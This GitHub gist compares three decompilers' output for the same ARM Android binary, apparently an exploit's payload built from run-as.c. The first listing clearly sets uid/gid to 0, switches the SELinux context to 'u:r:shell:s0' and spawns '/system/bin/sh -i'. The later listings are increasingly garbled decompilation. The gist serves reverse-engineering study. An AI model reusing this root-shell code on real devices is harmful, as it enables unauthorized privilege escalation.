Skip to content

Instantly share code, notes, and snippets.

@nvsofts
Created March 8, 2019 19:14
Show Gist options
  • Save nvsofts/0e19f1a5ed886da4b0088d4536b379ae to your computer and use it in GitHub Desktop.
Save nvsofts/0e19f1a5ed886da4b0088d4536b379ae to your computer and use it in GitHub Desktop.
逆コンパイラの比較
undefined4 main(undefined4 uParm1,undefined4 *puParm2)
{
__uid_t _Var1;
int iVar2;
code *pcVar3;
int iVar4;
code *pcVar5;
undefined4 uVar6;
undefined4 local_28;
int canary;
canary = __stack_chk_guard;
uVar6 = *puParm2;
getuid();
__android_log_print(4,"exploit","uid %s %d",uVar6);
uVar6 = *puParm2;
_Var1 = getuid();
printf("uid %s %d",uVar6,_Var1);
putchar(10);
fflush((FILE *)usleep);
iVar2 = setresgid(0,0,0);
if ((iVar2 != 0) || (iVar2 = setresuid(0,0,0), iVar2 != 0)) {
__android_log_print(4,"exploit","setresgid/setresuid failed");
printf("setresgid/setresuid failed");
putchar(10);
fflush((FILE *)usleep);
}
_Var1 = getuid();
__android_log_print(4,"exploit","uid %d",_Var1);
_Var1 = getuid();
printf("uid %d",_Var1);
putchar(10);
fflush((FILE *)usleep);
dlerror();
iVar2 = dlopen("/system/lib/libselinux.so",1);
if (iVar2 == 0) {
__android_log_print(4,"exploit","no selinux?");
printf("no selinux?");
putchar(10);
fflush((FILE *)usleep);
}
else {
pcVar3 = (code *)dlsym(iVar2,"getcon");
iVar4 = dlerror();
if (iVar4 == 0) {
uVar6 = (*pcVar3)(&local_28);
__android_log_print(4,"exploit","%d %s",uVar6);
printf("%d %s",uVar6,local_28);
putchar(10);
fflush((FILE *)usleep);
pcVar5 = (code *)dlsym(iVar2,"setcon");
iVar4 = dlerror();
if (iVar4 == 0) {
(*pcVar5)("u:r:shell:s0");
uVar6 = (*pcVar3)(&local_28);
__android_log_print(4,"exploit","context %d %s",uVar6);
printf("context %d %s",uVar6,local_28);
putchar(10);
}
else {
__android_log_print(4,"exploit","dlsym setcon error %s",iVar4);
printf("dlsym setcon error %s",iVar4);
putchar(10);
}
}
else {
__android_log_print(4,"exploit","dlsym error %s",iVar4);
printf("dlsym error %s",iVar4);
putchar(10);
}
fflush((FILE *)usleep);
dlclose(iVar2);
}
system("/system/bin/sh -i");
if (__stack_chk_guard != canary) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return 0;
}
// From module: ./run-as.c
// Address range: 0xc30 - 0xe24
// Line range: 27 - 71
int main(int argc, char ** argv) {
int32_t v1 = *(int32_t *)-0x15000100;
int32_t v2 = argc; // r5
getuid();
int32_t format = 0;
__android_log_print(4, (char *)argc, (char *)format);
getuid();
printf((char *)format);
putchar(10);
fflush((struct _IO_FILE *)-0x1e5fffa9);
int32_t v3 = 0; // r1
int32_t v4; // bp-40
int32_t format2;
char * file_path;
int32_t format6;
int32_t format3;
char * format4;
int32_t format5;
int32_t v5;
int32_t * v6;
int32_t * v7;
if (setresgid(0, 0, 0) != 0) {
// 0xc96
format2 = argc;
__android_log_print(4, (char *)v3, (char *)format2);
printf((char *)format2);
putchar(10);
fflush((struct _IO_FILE *)((int32_t)g9 + 84));
// branch -> 0xcba
// 0xcba
getuid();
__android_log_print(4, (char *)v3, (char *)argc);
getuid();
printf((char *)argc);
putchar(10);
fflush((struct _IO_FILE *)((int32_t)g9 + 84));
file_path = dlerror();
v6 = dlopen(file_path, RTLD_LAZY);
argc = (int32_t)v6;
if (v6 == NULL) {
// 0xd2e
__android_log_print(4, (char *)1, "no selinux?");
printf("no selinux?");
putchar(10);
fflush((struct _IO_FILE *)0x33a04064);
// branch -> 0xdfe
} else {
// 0xcfa
dlsym(v6, (char *)1);
if (dlerror() == NULL) {
// 0xd56
format3 = v2;
__android_log_print(4, (char *)1, (char *)format3);
printf((char *)format3);
putchar(10);
fflush((struct _IO_FILE *)((int32_t)g9 + 84));
dlsym((int32_t *)argc, (char *)&v4);
format4 = dlerror();
if (format4 == NULL) {
// 0xdbe
__android_log_print(4, (char *)&v4, NULL);
printf((char *)(int32_t)format4);
putchar(10);
// branch -> 0xdf0
} else {
// 0xd9c
format5 = v2;
__android_log_print(4, (char *)&v4, (char *)format5);
printf((char *)format5);
putchar(10);
// branch -> 0xdf0
}
// 0xdf0
fflush((struct _IO_FILE *)(*(int32_t *)(int32_t)&g8 + 84));
dlclose((int32_t *)argc);
// branch -> 0xdfe
// 0xdfe
system("/system/bin/sh -i");
v5 = *(int32_t *)-0x14ffffbe;
if (v5 == v1) {
// bb
return v5 - v1;
}
// 0xe1e
__stack_chk_fail();
return (int32_t)&v7;
}
// 0xd0c
format6 = v2;
__android_log_print(4, (char *)1, (char *)format6);
printf((char *)format6);
putchar(10);
// branch -> 0xdf0
// 0xdf0
fflush((struct _IO_FILE *)(*(int32_t *)(int32_t)&g4 + 84));
dlclose((int32_t *)argc);
// branch -> 0xdfe
}
// 0xdfe
system("/system/bin/sh -i");
v5 = *(int32_t *)-0x14ffffbe;
if (v5 == v1) {
// bb
return v5 - v1;
}
// 0xe1e
__stack_chk_fail();
return (int32_t)&v7;
}
// 0xc8a
v3 = 0;
if (setresuid(0, 0, 0) != 0) {
// 0xc96
format2 = argc;
__android_log_print(4, (char *)v3, (char *)format2);
printf((char *)format2);
putchar(10);
fflush((struct _IO_FILE *)((int32_t)g9 + 84));
// branch -> 0xcba
}
// 0xcba
getuid();
__android_log_print(4, (char *)v3, (char *)argc);
getuid();
printf((char *)argc);
putchar(10);
fflush((struct _IO_FILE *)((int32_t)g9 + 84));
file_path = dlerror();
v6 = dlopen(file_path, RTLD_LAZY);
argc = (int32_t)v6;
if (v6 == NULL) {
// 0xd2e
__android_log_print(4, (char *)1, "no selinux?");
printf("no selinux?");
putchar(10);
fflush((struct _IO_FILE *)0x33a04064);
// branch -> 0xdfe
} else {
// 0xcfa
dlsym(v6, (char *)1);
if (dlerror() == NULL) {
// 0xd56
format3 = v2;
__android_log_print(4, (char *)1, (char *)format3);
printf((char *)format3);
putchar(10);
fflush((struct _IO_FILE *)((int32_t)g9 + 84));
dlsym((int32_t *)argc, (char *)&v4);
format4 = dlerror();
if (format4 == NULL) {
// 0xdbe
__android_log_print(4, (char *)&v4, NULL);
printf((char *)(int32_t)format4);
putchar(10);
// branch -> 0xdf0
} else {
// 0xd9c
format5 = v2;
__android_log_print(4, (char *)&v4, (char *)format5);
printf((char *)format5);
putchar(10);
// branch -> 0xdf0
}
// 0xdf0
fflush((struct _IO_FILE *)(*(int32_t *)(int32_t)&g8 + 84));
dlclose((int32_t *)argc);
// branch -> 0xdfe
// 0xdfe
system("/system/bin/sh -i");
v5 = *(int32_t *)-0x14ffffbe;
if (v5 == v1) {
// bb
return v5 - v1;
}
// 0xe1e
__stack_chk_fail();
return (int32_t)&v7;
}
// 0xd0c
format6 = v2;
__android_log_print(4, (char *)1, (char *)format6);
printf((char *)format6);
putchar(10);
// branch -> 0xdf0
// 0xdf0
fflush((struct _IO_FILE *)(*(int32_t *)(int32_t)&g4 + 84));
dlclose((int32_t *)argc);
// branch -> 0xdfe
}
// 0xdfe
system("/system/bin/sh -i");
v5 = *(int32_t *)-0x14ffffbe;
if (v5 == v1) {
// bb
return v5 - v1;
}
// 0xe1e
__stack_chk_fail();
return (int32_t)&v7;
}
/* $t */
void t() {
int1_t less1;
int1_t z2;
int1_t n3;
int1_t n4;
uint32_t r8_5;
int32_t r8_6;
int1_t v7;
int1_t v8;
int1_t less9;
int1_t n10;
int1_t c11;
uint32_t r6_12;
int32_t r6_13;
int32_t r6_14;
if (!less1) {
__asm__("svcge #0x3b5f0");
}
if (z2) {
fun_3b0f0();
}
if (n3) {
__asm__("ldmdami sl!, {r2, r7, ip, sp, pc} ^");
}
if (n4) {
r8_5 = reinterpret_cast<uint32_t>(r8_6 - reinterpret_cast<int32_t>("eate"));
}
if (v7) {
__asm__("stmdavs r0, {fp, sp, lr}");
}
if (v8) {
__asm__("stmdavs r5!, {r0, r1, ip, pc}");
}
__asm__("svc #0x32f7ff");
if (!less9) {
n10 = __intrinsic();
c11 = r6_12 < -(r8_5 >> r6_13 | r8_5 << reinterpret_cast<uint32_t>(32 - r6_14));
}
if (c11) {
}
if (n10) {
__asm__("qasxmi r4, fp, r2");
}
__asm__("svc #0x30f7ff");
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment